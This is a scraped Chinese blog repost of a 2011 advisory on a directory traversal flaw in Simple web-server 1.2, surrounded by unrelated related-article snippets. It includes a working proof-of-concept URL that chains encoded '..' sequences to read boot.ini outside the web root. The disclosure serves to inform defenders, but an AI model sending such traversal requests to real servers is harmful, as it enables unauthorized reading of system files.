Simple web-server目录遍历漏洞

最新推荐文章于 2024-03-31 09:49:39 发布
最新推荐文章于 2024-03-31 09:49:39 发布
阅读量296 收藏
点赞数
文章标签: java javascript ViewUI
原文链接:https://yq.aliyun.com/articles/469239
版权

漏洞描述:

Simple web-server是一款WEB服务程序。 Simple web-server不正确处理目录遍历字符序列,远程攻击者可以利用漏洞以WEB权限查看系统文件内容。

------------------------------------------------------------------------
Software................Simple web-server 1.2
Vulnerability...........Directory Traversal
Threat Level............Serious (3/5)
Download................http://www.storecalc.com
Discovery Date..........6/1/2011
Tested On...............Windows XP SP3 EN
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>>
------------------------------------------------------------------------


--Description--

A directory traversal vulnerability in Simple web-server 1.2 can be
exploited to read files outside of the web root.


--PoC--

http://localhost/%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../boot.ini

本文转自enables 51CTO博客,原文链接:http://blog.51cto.com/niuzu/586063,如需转载请自行联系原作者


 

weixin_33937778
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SimplewebRTC使用指南
08-03 6037
SimplewebRTC使用指南   1.      软件: NATs穿透服务器:turnserver   https://code.google.com/p/rfc5766-turn-server/ (也可以用restund代替turnserver  http://www.creytiv.com/restund.html) 信令服务器:nodejs:https://nodejs.o
node构建一个简单simple web服务器
qq_34412985的博客
12-22 180
1.node中的核心模块:http var http = require('http'); 2.使用http.createServer()方法创建一个web服务器,返回一个server实例。 var server=http.createServer(); 3.服务器:提供对数据的服务,发送 接收 处理请求,给个反馈即发送响应,注册request请求事件,当客户端请求过来,就会自动触发服务器...
探秘简洁高效的 SimpleWebServer: 构建你自己的小型 Web 服务器
gitblog_00097的博客
03-31 442
探秘简洁高效的 SimpleWebServer: 构建你自己的小型 Web 服务器 项目地址:https://gitcode.com/Sakura1221/SimpleWebServer 在互联网世界中,Web 服务器是不可或缺的一环。它们负责接收客户端(浏览器)的请求,并返回相应的网页数据。如果你对网络编程感兴趣或者想深入了解 Web 工作原理,Sakura1221's SimpleWebSer...
简单搭建simplewebrtc环境
csj6346的专栏
08-06 6158
简要介绍 simplewebrtc是一种简单的开源网页音视频聊天解决方案,由三部分组成: NAT穿透服务器,负责内网穿透,音视频转发 信令服务器,负责信令控制,建立点对点通道 web客户端,负责用户交互和展示 总体参考https://www.cnblogs.com/yubaolee/p/webrtc.html 谢谢yubaolee大神 搭建过程中遇到一些问题,记录一下 准备工作 服...
simple web server
01-11
模仿how tomcat works第一章写的程序
Simple-Web-Server:使用C ++ 11和Boost.Asio实现的非常简单,快速,多线程,独立于平台的HTTP和HTTPS服务器和客户端库。 创建是使REST资源可从C ++应用程序获得的简单方法
01-30
Simple-Web-Server:使用C ++ 11和Boost.Asio实现的非常简单,快速,多线程,独立于平台的HTTP和HTTPS服务器和客户端库。 创建是使REST资源可从C ++应用程序获得的简单方法
Simple-Web-Server笔记1
08-08
https://gitlab.com/eidheim/Simple-Web-Server配置按照gitlab上安装即可,需要注意几个问题,依赖的库的版本需要比较
rtsp-simple-server程序包
最新发布
04-09
用nginx搭建流媒体服务器是一个很好的方案,非常适合二次开发。不过这个方案的最大缺点就是配置繁琐,如果...相比之下,rtsp-simple-server就“亲民”很多了……,详见我的博文《迷你流媒体服务器rtsp-simple-server
simple-web-server
04-04
克隆存储库git clone https://github.com/sophie128/simple-webserver2.在model文件夹下的model.py中自定义模型函数,并解决依赖关系您只需要使用自己的模型逻辑来替换model.py中的foo函数。3.在本地运行REST API...
rtsp-simple-server:即用型RTSPRTMP服务器和代理,允许读取,发布和代理视频和音频流
02-04
rtsp-简单服务器 rtsp-simple-server是一个简单,易于使用且零依赖的RTSP / RTMP服务器和代理,该软件允许用户发布,读取和代理实时视频和音频流。 RTSP是一个规范,描述了如何在服务器的帮助下执行这些操作,发布者...
Simple web-开源
07-19
使用 Microsoft VB9 制作的易于使用的网络浏览器,它可以在所有 Windows 机器上运行,并且几乎使用由来自 Simple 的 Jesper 制作的 CPU 空间。 对于所有在那里的人享受。 请告诉我是否有任何错误
SimpleWebCamera 安卓 usb uvc摄像头 读取 预览
12-22
SimpleWebCamera 安卓 usb uvc摄像头 读取 预览
HTTP 请求走私漏洞
qq_63267612的博客
08-14 1337
所谓CL-TE,就是当收到存在两个请求头的请求包时,前端代理服务器只处理Content-Length这一请求头,而后端服务器会遵守RFC2616的规定,忽略掉Content-Length,处理Transfer-Encoding这一请求头。前端服务器收到该请求,通过读取Content-Length,判断这是一个完整的请求,然后转发给后端服务器,而后端服务器收到后,因为它不对Content-Length进行处理,由于Pipeline的存在,它就认为这是收到了两个请求,分别是。这就有可能导致请求走私。......
【常见Web应用安全问题】---4、Directory traversal
weixin_34331102的博客
12-22 327
Web应用程序的安全性问题依其存在的形势划分,种类繁多,这里不准备介绍所有的,只介绍常见的一些。  常见Web应用安全问题安全性问题的列表:   1、跨站脚本攻击(CSS or XSS, Cross Site Scripting)   2、SQL注入攻击(SQL injection)   3、远程命令执行(Code execution,个人觉得译成代码执行并不确...
远程命令执行漏洞总结
2201_75857869的博客
02-09 377
fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。fastjson.jar是阿里开发的一款专门用于Java开发的包,可以方便的实现json对象与JavaBean对象的转换,实现JavaBean对象与json字符串的转换,实现json对象与json字符串的转换。除了这个fastjson以外,还有Google开发的Gson包,其他形式的如net.sf.json包,都可以实现json的转换。方法名称不同而已,最后的实现结果都是一样的。
目录遍历攻击详解
metheir的博客
01-08 8268
对于一个安全的Web服务器来说,对Web内容进行恰当的访问控制是极为关键的。目录遍历是Http所存在的一个安全漏洞,它使得攻击者能够访问受限制的目录,并在Web服务器的根目录以外执行命令。   Web服务器主要提供两个级别的安全机制:   访问控制列表——就是我们常说的ACL   根目录访问   访问控制列表是用于授权过程的,它是一个Web服务器的管理员用来说明什么用户或用
目录遍历漏洞讲解(IIS、Apache)
test\\的博客
10-20 6937
目录遍历是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意文件,甚至执行系统命令。 IIS IIS目录遍历 IIS目录遍历又称IIS目录穿越。 由于没有使用或部署良好设计的输入漏洞措施,攻击者可以利用这些漏洞来读取或改写原本不能正常读取访问的目录或文件。 在一些特别的情况,攻击者甚至可能...
SimpleHttpServer的一个小问题,修了5年!
备忘
07-28 555
python 2.5.2 Windows的安装包安装的,在用web.py 0.23,调试的时候当然只用自带的调试web server,其实就是SimpleHTTPServer.py,发现一个怪问题,打开所有页面都有10秒的延迟,浏览器的进度条一直不结束,10秒后才在状态栏上显示完成!终于发现/static/css/下的所有css都下载很慢,但是在cygwin python 2.5.1下,这个问题就...
deben系统怎么下载rtsp-simple-server
05-26
5. 进入rtsp-simple-server目录,输入以下命令,以编译rtsp-simple-server: ``` cd rtsp-simple-server go build ``` 6. 完成编译后,你可以在rtsp-simple-server目录中找到可执行文件。 现在,你已经成功地...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值